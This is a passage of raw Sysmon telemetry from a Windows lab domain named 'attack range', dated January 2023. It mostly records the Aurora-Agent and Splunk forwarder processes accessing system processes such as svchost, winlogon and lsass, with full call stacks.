Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.762{FE4C2B44-E487-63C7-2C06-00000000AF02}66646604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.753{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.744{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.731{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000042122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.728{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=664F9798FA0057212C882306C3CE0D0E,SHA256=AD938974324BC8B5C51D148C9649200B7F85FCFA12FF768268410361C8D95556,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.725{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.695{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000016638Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.785{E5A8D418-E487-63C7-0602-00000000B002}22801472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016637Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E487-63C7-0602-00000000B002}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016636Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016635Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016634Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016633Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016632Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016631Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016630Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016629Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016628Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016627Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E487-63C7-0602-00000000B002}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016626Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.629{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E487-63C7-0602-00000000B002}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016625Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.630{E5A8D418-E487-63C7-0602-00000000B002}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 